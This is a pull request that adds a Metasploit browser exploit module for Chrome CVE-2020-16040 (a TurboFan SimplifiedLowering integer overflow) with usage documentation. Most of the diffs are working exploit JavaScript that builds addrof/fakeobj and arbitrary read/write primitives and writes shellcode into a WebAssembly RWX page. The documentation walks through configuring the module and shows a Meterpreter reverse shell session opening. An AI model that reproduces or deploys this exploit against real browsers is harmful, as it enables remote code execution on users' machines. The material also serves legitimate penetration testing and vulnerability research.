### PR TITLE
Add exploit for chrome CVE-2020-16040

### DIFF
--- a/documentation/modules/exploit/multi/browser/chrome_simplifiedlowering_overflow.md
+++ b/documentation/modules/exploit/multi/browser/chrome_simplifiedlowering_overflow.md
@@ -1,0 +1,54 @@
+This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit). The exploit makes use of a integer overflow in the SimplifiedLowering phase in turbofan. It is used along with a typer hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1. This is abused to gain arbitrary read/write into the isolate region. Then an ArrayBuffer can be used to achieve absolute arbitrary read/write.
+The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
+
+**The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.**
+
+## Vulnerable Application
+
+The module is compatible with any 64bit Google Chrome (versions before 87.0.4280.88) on multiple platforms. However, the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.
+
+**Vulnerable Application Installation Steps**
+
+You can download a vulnerable Chrome version from this location:
+[https://chromium.cypress.io/win64/stable/87.0.4280.66](https://chromium.cypress.io/win64/stable/87.0.4280.66)
+
+1. Do: ```use exploit/multi/browser/chrome_simplifiedlowering_overflow```
+2. Do: ```set URIPATH / [PATH]```
+3. Do: ```set LHOST [IP]```
+4. Do: ```set SRVHOST [IP]```
+5. Do: ```exploit```
+
+## Scenarios
+
+### Windows 10 and Google Chrome 87.0.4280.66 with --no-sandbox
+Start Google Chrome without a sandbox:
+```➜  ~ google-chrome-stable --no-sandbox```
+
+```
+msf5 > use exploit/multi/browser/chrome_simplifiedlowering_overflow
+[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvport 80
+srvport => 80
+msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set uripath /
+uripath => /
+msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvhost 127.0.0.1
+srvhost => 127.0.0.1
+msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set lhost 127.0.0.1
+lhost => 127.0.0.1
+msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+msf5 exploit(multi/browser/chrome) > [*] Using URL: http://127.0.0.1:80/
+[*] Server started.
+[*] 127.0.0.1        chrome_simplifiedlowering_overflow - Sending /index.html to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+[*] Sending stage (3012516 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:44046) at 2021-04-06 16:33:05 +0530
+
+msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > 
+```

--- a/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
+++ b/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
-    shellcode = Rex::Text.to_num(payload.raw).gsub(/\r\n/, '')
+    shellcode = Rex::Text.to_num(payload.encoded).gsub(/\r\n/, '')
     jscript = <<~JS
       var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
       var wasm_mod = new WebAssembly.Module(wasm_code);
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
       var f64_buf = new Float64Array(buf);
       var u64_buf = new Uint32Array(buf);
       var shellcode = new Uint8Array([#{shellcode}]);
-      var shellbuf = new ArrayBuffer(0x2000);
+      var shellbuf = new ArrayBuffer(shellcode.length);
       var dataview = new DataView(shellbuf);
 
       function ftoi(val) {

--- a/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
+++ b/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
@@ -60,7 +60,8 @@ class MetasploitModule < Msf::Exploit::Remote
       var f64_buf = new Float64Array(buf);
       var u64_buf = new Uint32Array(buf);
       var shellcode = new Uint8Array([#{shellcode}]);
-      let buf2 = new ArrayBuffer(0x2000);
+      var shellbuf = new ArrayBuffer(0x2000);
+      var dataview = new DataView(shellbuf);
 
       function ftoi(val) {
         f64_buf[0] = val;
@@ -134,8 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
 
       function copy_shellcode(addr, shellcode) {
-        let dataview = new DataView(buf2);
-        let buf_addr = addrof(buf2);
+        let buf_addr = addrof(shellbuf);
         let backing_store_addr = buf_addr + 0x14n;
         arbwrite(backing_store_addr, addr);
 

--- a/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
+++ b/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
@@ -93,10 +93,14 @@ class MetasploitModule < Msf::Exploit::Remote
         return [arr, cor];
       }
 
-      for(var i=0;i<0x3000;++i)
-        foo(true);
+      try {
+        for(var i=0;i<0x3000;++i)
+          foo(true);
 
-      var x = foo(false);
+        var x = foo(false);
+      } catch (e) {
+        location.reload();
+      }
       var arr = x[0];
       var cor = x[1];
 

--- a/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
+++ b/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
@@ -31,7 +31,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2020-16040'],
           ['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'],
           ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],
-          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],
           ['URL', 'https://faraz.faith/2021-01-07-cve-2020-16040-analysis/'],
           ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1150649'],
         ],
@@ -52,122 +51,122 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
     js_payload = Rex::Text.to_num(payload.raw).gsub(/\n/, '').gsub(/\x0d/, '')
     jscript = <<~JS
-            var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
-            var wasm_mod = new WebAssembly.Module(wasm_code);
-            var wasm_instance = new WebAssembly.Instance(wasm_mod);
-            var f = wasm_instance.exports.main;
-      #{'      '}
-            var buf = new ArrayBuffer(8);
-            var f64_buf = new Float64Array(buf);
-            var u64_buf = new Uint32Array(buf);
-            var sc = new ArrayBuffer(0x150);
-            var u8_buf = new Uint8Array(sc);
-            var u32_buf = new Uint32Array(sc);
-            let buf2 = new ArrayBuffer(0x2000);
-      #{'      '}
-            function ftoi(val) {
-                f64_buf[0] = val;
-                return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
-            }
-      #{'      '}
-            function itof(val) {
-                u64_buf[0] = Number(val & 0xffffffffn);
-                u64_buf[1] = Number(val >> 32n);
-                return f64_buf[0];
-            }
-      #{'      '}
-            function foo(a) {
-              var y = 0x7fffffff;
-      #{'      '}
-              if (a == NaN) y = NaN;
-              if (a) y = -1;
-      #{'      '}
-              let z = y + 1;
-              z >>= 31;
-              z = 0x80000000 - Math.sign(z|1);
-      #{'      '}
-              if(a) z = 0;
-      #{'      '}
-              var arr = new Array(0-Math.sign(z));
-              arr.shift();
-              var cor = [1.1, 1.2, 1.3];
-      #{'      '}
-              return [arr, cor];
-            }
-      #{'      '}
-            for(var i=0;i<0x3000;++i)
-                foo(true);
-      #{'      '}
-            var x = foo(false);
-            var arr = x[0];
-            var cor = x[1];
-      #{'      '}
-            const idx = 6;
-            arr[idx+10] = 0x4242;
-      #{'      '}
-            function addrof(k) {
-                arr[idx+1] = k;
-                return ftoi(cor[0]) & 0xffffffffn;
-            }
-      #{'      '}
-            function fakeobj(k) {
-                cor[0] = itof(k);
-                return arr[idx+1];
-            }
-      #{'      '}
-            var float_array_map = ftoi(cor[3]);
-      #{'      '}
-            var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
-            var fake = fakeobj(addrof(arr2) + 0x20n);
-      #{'      '}
-            function arbread(addr) {
-                if (addr % 2n == 0) {
-                    addr += 1n;
-                }
-                arr2[1] = itof((2n << 32n) + addr - 8n);
-                return ftoi(fake[0]);
-            }
-      #{'      '}
-            function arbwrite(addr, val) {
-                if (addr % 2n == 0) {
-                    addr += 1n;
-                }
-                arr2[1] = itof((2n << 32n) + addr - 8n);
-                fake[0] = itof(BigInt(val));
-            }
-      #{'      '}
-            function copy_shellcode(addr, shellcode) {
-                let dataview = new DataView(buf2);
-                let buf_addr = addrof(buf2);
-                let backing_store_addr = buf_addr + 0x14n;
-                arbwrite(backing_store_addr, addr);
-      #{'      '}
-                for (let i = 0; i < shellcode.length; i++) {
-                    dataview.setUint32(4*i, shellcode[i], true);
-                }
-            }
-      #{'      '}
-            var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n);
-            var shellcode = [#{js_payload}];
-            while(shellcode.length % 4)
-                shellcode.push(0x90);
-            for(i=0;i<shellcode.length;++i)
-                u8_buf[i] = shellcode[i];
-            copy_shellcode(rwx_page_addr, u32_buf);
-            f();
+      var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
+      var wasm_mod = new WebAssembly.Module(wasm_code);
+      var wasm_instance = new WebAssembly.Instance(wasm_mod);
+      var wasm_func = wasm_instance.exports.main;
+
+      var buf = new ArrayBuffer(8);
+      var f64_buf = new Float64Array(buf);
+      var u64_buf = new Uint32Array(buf);
+      var sc = new ArrayBuffer(0x150);
+      var u8_buf = new Uint8Array(sc);
+      var u32_buf = new Uint32Array(sc);
+      let buf2 = new ArrayBuffer(0x2000);
+
+      function ftoi(val) {
+        f64_buf[0] = val;
+        return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+      }
+
+      function itof(val) {
+        u64_buf[0] = Number(val & 0xffffffffn);
+        u64_buf[1] = Number(val >> 32n);
+        return f64_buf[0];
+      }
+
+      function foo(a) {
+        var y = 0x7fffffff;
+
+        if (a == NaN) y = NaN;
+        if (a) y = -1;
+
+        let z = y + 1;
+        z >>= 31;
+        z = 0x80000000 - Math.sign(z|1);
+
+        if(a) z = 0;
+
+        var arr = new Array(0-Math.sign(z));
+        arr.shift();
+        var cor = [1.1, 1.2, 1.3];
+
+        return [arr, cor];
+      }
+
+      for(var i=0;i<0x3000;++i)
+        foo(true);
+
+      var x = foo(false);
+      var arr = x[0];
+      var cor = x[1];
+
+      const idx = 6;
+      arr[idx+10] = 0x4242;
+
+      function addrof(k) {
+        arr[idx+1] = k;
+        return ftoi(cor[0]) & 0xffffffffn;
+      }
+
+      function fakeobj(k) {
+        cor[0] = itof(k);
+        return arr[idx+1];
+      }
+
+      var float_array_map = ftoi(cor[3]);
+
+      var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
+      var fake = fakeobj(addrof(arr2) + 0x20n);
+
+      function arbread(addr) {
+        if (addr % 2n == 0) {
+          addr += 1n;
+        }
+        arr2[1] = itof((2n << 32n) + addr - 8n);
+        return ftoi(fake[0]);
+      }
+
+      function arbwrite(addr, val) {
+        if (addr % 2n == 0) {
+          addr += 1n;
+        }
+        arr2[1] = itof((2n << 32n) + addr - 8n);
+        fake[0] = itof(BigInt(val));
+      }
+
+      function copy_shellcode(addr, shellcode) {
+        let dataview = new DataView(buf2);
+        let buf_addr = addrof(buf2);
+        let backing_store_addr = buf_addr + 0x14n;
+        arbwrite(backing_store_addr, addr);
+
+        for (let i = 0; i < shellcode.length; i++) {
+          dataview.setUint32(4*i, shellcode[i], true);
+        }
+      }
+
+      var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n);
+      var shellcode = [#{js_payload}];
+      while(shellcode.length % 4)
+        shellcode.push(0x90);
+      for(i=0;i<shellcode.length;++i)
+        u8_buf[i] = shellcode[i];
+      copy_shellcode(rwx_page_addr, u32_buf);
+      wasm_func();
     JS
 
-    html = %(
-<html>
-<head>
-<script>
-#{jscript}
-</script>
-</head>
-<body>
-</body>
-</html>
-    )
+    html = <<~HTML
+      <html>
+      <head>
+      <script>
+      #{jscript}
+      </script>
+      </head>
+      <body>
+      </body>
+      </html>
+    HTML
     send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
   end
 

--- a/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
+++ b/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
-    js_payload = Rex::Text.to_num(payload.raw).gsub(/\n/, '').gsub(/\x0d/, '')
+    shellcode = Rex::Text.to_num(payload.raw).gsub(/\r\n/, '')
     jscript = <<~JS
       var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
       var wasm_mod = new WebAssembly.Module(wasm_code);
@@ -59,9 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
       var buf = new ArrayBuffer(8);
       var f64_buf = new Float64Array(buf);
       var u64_buf = new Uint32Array(buf);
-      var sc = new ArrayBuffer(0x150);
-      var u8_buf = new Uint8Array(sc);
-      var u32_buf = new Uint32Array(sc);
+      var shellcode = new Uint8Array([#{shellcode}]);
       let buf2 = new ArrayBuffer(0x2000);
 
       function ftoi(val) {
@@ -142,17 +140,12 @@ class MetasploitModule < Msf::Exploit::Remote
         arbwrite(backing_store_addr, addr);
 
         for (let i = 0; i < shellcode.length; i++) {
-          dataview.setUint32(4*i, shellcode[i], true);
+          dataview.setUint8(i, shellcode[i]);
         }
       }
 
       var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n);
-      var shellcode = [#{js_payload}];
-      while(shellcode.length % 4)
-        shellcode.push(0x90);
-      for(i=0;i<shellcode.length;++i)
-        u8_buf[i] = shellcode[i];
-      copy_shellcode(rwx_page_addr, u32_buf);
+      copy_shellcode(rwx_page_addr, shellcode);
       wasm_func();
     JS
 

--- a/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
+++ b/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
@@ -31,6 +31,9 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2020-16040'],
           ['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'],
           ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],
+          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],
+          ['URL', 'https://faraz.faith/2021-01-07-cve-2020-16040-analysis/'],
+          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1150649'],
         ],
         'Arch' => [ ARCH_X64 ],
         'DefaultTarget' => 0,
@@ -40,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
             ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }],
             ['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }],
           ],
-        'DisclosureDate' => '2021-03-03'
+        'DisclosureDate' => '2020-11-19'
       )
     )
   end
@@ -48,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, request)
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
     js_payload = Rex::Text.to_num(payload.raw).gsub(/\n/, '').gsub(/\x0d/, '')
-    jscript = %^
+    jscript = <<~JS
 var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
 var wasm_mod = new WebAssembly.Module(wasm_code);
 var wasm_instance = new WebAssembly.Instance(wasm_mod);
@@ -60,7 +63,7 @@ var u64_buf = new Uint32Array(buf);
 var sc = new ArrayBuffer(0x150);
 var u8_buf = new Uint8Array(sc);
 var u32_buf = new Uint32Array(sc);
-let buf2 = new ArrayBuffer(0x150);
+let buf2 = new ArrayBuffer(0x2000);
 
 function ftoi(val) {
     f64_buf[0] = val;
@@ -122,7 +125,7 @@ function arbread(addr) {
         addr += 1n;
     }
     arr2[1] = itof((2n << 32n) + addr - 8n);
-    return (fake[0]);
+    return ftoi(fake[0]);
 }
 
 function arbwrite(addr, val) {
@@ -144,8 +147,7 @@ function copy_shellcode(addr, shellcode) {
     }
 }
 
-var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
-console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
+var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n);
 var shellcode = [#{js_payload}];
 while(shellcode.length % 4)
     shellcode.push(0x90);
@@ -153,7 +155,7 @@ for(i=0;i<shellcode.length;++i)
     u8_buf[i] = shellcode[i];
 copy_shellcode(rwx_page_addr, u32_buf);
 f();
-^
+JS
 
     html = %(
 <html>

--- a/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
+++ b/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
@@ -52,110 +52,110 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
     js_payload = Rex::Text.to_num(payload.raw).gsub(/\n/, '').gsub(/\x0d/, '')
     jscript = <<~JS
-var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
-var wasm_mod = new WebAssembly.Module(wasm_code);
-var wasm_instance = new WebAssembly.Instance(wasm_mod);
-var f = wasm_instance.exports.main;
-
-var buf = new ArrayBuffer(8);
-var f64_buf = new Float64Array(buf);
-var u64_buf = new Uint32Array(buf);
-var sc = new ArrayBuffer(0x150);
-var u8_buf = new Uint8Array(sc);
-var u32_buf = new Uint32Array(sc);
-let buf2 = new ArrayBuffer(0x2000);
-
-function ftoi(val) {
-    f64_buf[0] = val;
-    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
-}
-
-function itof(val) {
-    u64_buf[0] = Number(val & 0xffffffffn);
-    u64_buf[1] = Number(val >> 32n);
-    return f64_buf[0];
-}
-
-function foo(a) {
-  var y = 0x7fffffff;
-
-  if (a == NaN) y = NaN;
-  if (a) y = -1;
-
-  let z = y + 1;
-  z >>= 31;
-  z = 0x80000000 - Math.sign(z|1);
-
-  if(a) z = 0;
-
-  var arr = new Array(0-Math.sign(z));
-  arr.shift();
-  var cor = [1.1, 1.2, 1.3];
-
-  return [arr, cor];
-}
-
-for(var i=0;i<0x3000;++i)
-    foo(true);
-
-var x = foo(false);
-var arr = x[0];
-var cor = x[1];
-
-const idx = 6;
-arr[idx+10] = 0x4242;
-
-function addrof(k) {
-    arr[idx+1] = k;
-    return ftoi(cor[0]) & 0xffffffffn;
-}
-
-function fakeobj(k) {
-    cor[0] = itof(k);
-    return arr[idx+1];
-}
-
-var float_array_map = ftoi(cor[3]);
-
-var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
-var fake = fakeobj(addrof(arr2) + 0x20n);
-
-function arbread(addr) {
-    if (addr % 2n == 0) {
-        addr += 1n;
-    }
-    arr2[1] = itof((2n << 32n) + addr - 8n);
-    return ftoi(fake[0]);
-}
-
-function arbwrite(addr, val) {
-    if (addr % 2n == 0) {
-        addr += 1n;
-    }
-    arr2[1] = itof((2n << 32n) + addr - 8n);
-    fake[0] = itof(BigInt(val));
-}
-
-function copy_shellcode(addr, shellcode) {
-    let dataview = new DataView(buf2);
-    let buf_addr = addrof(buf2);
-    let backing_store_addr = buf_addr + 0x14n;
-    arbwrite(backing_store_addr, addr);
-
-    for (let i = 0; i < shellcode.length; i++) {
-        dataview.setUint32(4*i, shellcode[i], true);
-    }
-}
-
-var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n);
-var shellcode = [#{js_payload}];
-while(shellcode.length % 4)
-    shellcode.push(0x90);
-for(i=0;i<shellcode.length;++i)
-    u8_buf[i] = shellcode[i];
-copy_shellcode(rwx_page_addr, u32_buf);
-f();
-JS
+            var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
+            var wasm_mod = new WebAssembly.Module(wasm_code);
+            var wasm_instance = new WebAssembly.Instance(wasm_mod);
+            var f = wasm_instance.exports.main;
+      #{'      '}
+            var buf = new ArrayBuffer(8);
+            var f64_buf = new Float64Array(buf);
+            var u64_buf = new Uint32Array(buf);
+            var sc = new ArrayBuffer(0x150);
+            var u8_buf = new Uint8Array(sc);
+            var u32_buf = new Uint32Array(sc);
+            let buf2 = new ArrayBuffer(0x2000);
+      #{'      '}
+            function ftoi(val) {
+                f64_buf[0] = val;
+                return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+            }
+      #{'      '}
+            function itof(val) {
+                u64_buf[0] = Number(val & 0xffffffffn);
+                u64_buf[1] = Number(val >> 32n);
+                return f64_buf[0];
+            }
+      #{'      '}
+            function foo(a) {
+              var y = 0x7fffffff;
+      #{'      '}
+              if (a == NaN) y = NaN;
+              if (a) y = -1;
+      #{'      '}
+              let z = y + 1;
+              z >>= 31;
+              z = 0x80000000 - Math.sign(z|1);
+      #{'      '}
+              if(a) z = 0;
+      #{'      '}
+              var arr = new Array(0-Math.sign(z));
+              arr.shift();
+              var cor = [1.1, 1.2, 1.3];
+      #{'      '}
+              return [arr, cor];
+            }
+      #{'      '}
+            for(var i=0;i<0x3000;++i)
+                foo(true);
+      #{'      '}
+            var x = foo(false);
+            var arr = x[0];
+            var cor = x[1];
+      #{'      '}
+            const idx = 6;
+            arr[idx+10] = 0x4242;
+      #{'      '}
+            function addrof(k) {
+                arr[idx+1] = k;
+                return ftoi(cor[0]) & 0xffffffffn;
+            }
+      #{'      '}
+            function fakeobj(k) {
+                cor[0] = itof(k);
+                return arr[idx+1];
+            }
+      #{'      '}
+            var float_array_map = ftoi(cor[3]);
+      #{'      '}
+            var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
+            var fake = fakeobj(addrof(arr2) + 0x20n);
+      #{'      '}
+            function arbread(addr) {
+                if (addr % 2n == 0) {
+                    addr += 1n;
+                }
+                arr2[1] = itof((2n << 32n) + addr - 8n);
+                return ftoi(fake[0]);
+            }
+      #{'      '}
+            function arbwrite(addr, val) {
+                if (addr % 2n == 0) {
+                    addr += 1n;
+                }
+                arr2[1] = itof((2n << 32n) + addr - 8n);
+                fake[0] = itof(BigInt(val));
+            }
+      #{'      '}
+            function copy_shellcode(addr, shellcode) {
+                let dataview = new DataView(buf2);
+                let buf_addr = addrof(buf2);
+                let backing_store_addr = buf_addr + 0x14n;
+                arbwrite(backing_store_addr, addr);
+      #{'      '}
+                for (let i = 0; i < shellcode.length; i++) {
+                    dataview.setUint32(4*i, shellcode[i], true);
+                }
+            }
+      #{'      '}
+            var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n);
+            var shellcode = [#{js_payload}];
+            while(shellcode.length % 4)
+                shellcode.push(0x90);
+            for(i=0;i<shellcode.length;++i)
+                u8_buf[i] = shellcode[i];
+            copy_shellcode(rwx_page_addr, u32_buf);
+            f();
+    JS
 
     html = %(
 <html>

--- a/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
+++ b/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
@@ -10,41 +10,45 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase',
-      'Description'    => %q{
-      This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit).
-      The exploit makes use of a integer overflow in the SimplifiedLowering phase in turbofan.
-      It is used along with a typer hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1.
-      This is abused to gain arbitrary read/write into the isolate region.
-      Then an ArrayBuffer can be used to achieve absolute arbitrary read/write.
-      The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
-      The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [
+    super(
+      update_info(
+        info,
+        'Name' => 'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase',
+        'Description' => %q{
+          This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit).
+          The exploit makes use of a integer overflow in the SimplifiedLowering phase in turbofan.
+          It is used along with a typer hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1.
+          This is abused to gain arbitrary read/write into the isolate region.
+          Then an ArrayBuffer can be used to achieve absolute arbitrary read/write.
+          The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
+          The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Rajvardhan Agarwal (r4j)', # exploit
         ],
-      'References'     => [
+        'References' => [
           ['CVE', '2020-16040'],
           ['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'],
           ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],
         ],
-      'Arch'           => [ ARCH_X64 ],
-      'DefaultTarget'  => 0,
-      'Targets'        =>
-        [
-          ['Linux - Google Chrome 87.0.4280.66 (64 bit)', {'Platform' => 'linux'}],
-          ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', {'Platform' => 'win'}],
-          ['macOS - Google Chrome 87.0.4280.66 (64 bit)', {'Platform' => 'osx'}],
-        ],
-      'DisclosureDate' => '2021-03-03'))
+        'Arch' => [ ARCH_X64 ],
+        'DefaultTarget' => 0,
+        'Targets' =>
+          [
+            ['Linux - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'linux' }],
+            ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }],
+            ['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }],
+          ],
+        'DisclosureDate' => '2021-03-03'
+      )
+    )
   end
 
   def on_request_uri(cli, request)
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
-    js_payload = Rex::Text.to_num(payload.raw).gsub(/\n/, '').gsub(/\x0d/,'')
-    jscript = %Q^
+    js_payload = Rex::Text.to_num(payload.raw).gsub(/\n/, '').gsub(/\x0d/, '')
+    jscript = %^
 var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
 var wasm_mod = new WebAssembly.Module(wasm_code);
 var wasm_instance = new WebAssembly.Instance(wasm_mod);
@@ -151,7 +155,7 @@ copy_shellcode(rwx_page_addr, u32_buf);
 f();
 ^
 
-    html = %Q^
+    html = %(
 <html>
 <head>
 <script>
@@ -161,8 +165,8 @@ f();
 <body>
 </body>
 </html>
-    ^
-    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+    )
